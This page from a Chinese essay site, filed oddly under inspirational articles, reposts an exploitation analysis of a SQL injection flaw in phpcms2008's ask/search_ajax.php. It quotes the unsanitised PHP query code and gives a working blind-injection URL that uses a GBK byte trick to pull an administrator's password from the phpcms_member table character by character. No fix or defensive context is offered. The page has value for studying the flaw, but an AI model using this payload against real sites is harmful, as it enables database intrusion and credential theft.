首页 爱情文章 亲情文章 友情文章 生活随笔 校园文章 经典文章 人生哲理 励志文章 搞笑文章 心情日记
  • 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
    •
    当前位置: 山茶花美文网 > 励志文章 > 正文

    phpcms_phpcms2008,注入漏洞,利用分析

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    这个是最新有人发现的

    该漏洞文件:ask/search_ajax.php

    漏洞说明:

    /ask/search_ajax.php

    Code:

    if($q)

    {

    $where = " title LIKE "%$q%" AND status = 5";//没做过滤直接感染了$where

    }

    else

    {

    exit("null");

    }

    $infos = $ask->listinfo($where, "askid DESC", "", 10);

    /ask/include/answer.class.php

    Code:

    function listinfo($where = "", $order = "", $page = 1, $pagesize = 50)

    {

    if($where) $where = " WHERE $where";

    if($order) $order = " ORDER BY $order";

    $page = max(intval($page), 1);

    $offset = $pagesize*($page-1);

    $limit = " LIMIT $offset, $pagesize";

    $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");

    $number = $r["number"];

    $this->pages = pages($number, $page, $pagesize);

    $array = array();

    $i = 1;

    $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");

    while($r = $this->db->fetch_array($result))

    {

    $r["orderid"] = $i;

    $array[] = $r;

    $i++;

    }

    $this->number = $this->db->num_rows($result);

    $this->db->free_result($result);

    return $array;

    }

    测试方法:

    复制代码代码如下:

    /ask/search_ajax.php?q=s%D5"/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全

    最新文章

    热点文章

    推荐访问

    军训远足心得体会 军训爬山心得体会 大学军训徒步拉练感想 军训徒步作文 军训徒步10公里感想 军训徒步心得体会 5分钟演讲中秋节节日 中秋一分钟演讲 中秋节演讲稿4分钟 中秋节演讲稿一分钟 中秋节演讲稿五分钟 3-5分钟 中秋节短篇演讲稿 中秋节演讲稿两分钟 中秋节的演讲稿3分钟 关于中秋节的演讲稿三分钟 孩子体验军训的心得 参加孩子军训活动的感受与收获 家长对孩子军训后的收获和感悟 小孩军训的收获与感悟 学生军训的收获与感悟 孩子军训成长过程家长感悟 孩子军训感悟 孩子军训心得体会 孩子军训的收获与感悟 兵役前训练心得体会 部队当兵的心得 新兵役前教育训练心得体会 预备役军训心得体会 新兵军训感悟

    本文phpcms_phpcms2008,注入漏洞,利用分析由山茶花美文网整理提供,版权归原作者、原出处所有。

    Copyright © 山茶花美文网 All Rights Reserved.